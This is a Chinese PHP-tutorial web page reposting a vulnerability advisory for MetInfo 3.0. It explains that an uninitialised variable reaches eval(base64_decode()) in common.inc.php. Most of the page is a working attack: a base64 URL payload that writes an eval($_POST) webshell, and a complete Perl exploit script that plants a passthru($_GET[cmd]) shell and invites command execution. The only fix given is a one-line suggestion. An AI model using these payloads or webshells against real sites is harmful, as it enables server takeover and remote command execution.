网站地图    收藏   

主页 > 后端 > 网站安全 >

MetInfo 3.0 PHP代码注入漏洞及修复 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 15:08 作者: 阅读:

[导读] 影响版本:MetInfo 3.0漏洞描述:MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构MetInfo 3.0的/include/common.inc.php文件第67行:eval(base64_decode($allclass[0]));$allclass[...

影响版本:
MetInfo 3.0

漏洞描述:
MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构

MetInfo 3.0的/include/common.inc.php文件第67行:
eval(base64_decode($allclass[0]));
$allclass[0]变量未初始化,因此我们可以控制其值,进行代码注入的利用。<*参考
www.linux520.com
*>
测试

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://victim.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/

cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==

base64编码部分是 fputs(fopen(../templates/test.php,w+),<?php eval($_POST[c]);?>);

一句话后门:http://victim.com/templates/test.php 密码c

===========
#!/usr/bin/env perl
 
use LWP::UserAgent;
print "################################################################ ";
print "#              MetInfo 3.0 c0de inj3cti0n 3xplo!t              # ";
print "#                         by:linux520.com                      # ";
print "################################################################ ";
 
die "Usage: $0 <target site> Ex:$0 victim.com " unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request(GET,"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/

cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen(../templates/test.php,w+),<?php passthru($_GET[cmd]);?>);
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request(GET,"http://$victim/templates/test.php"));
if($response->is_success)
{
    print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}
####################################################################################

临时解决方案:
对$allclass[0]变量进行初始化

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论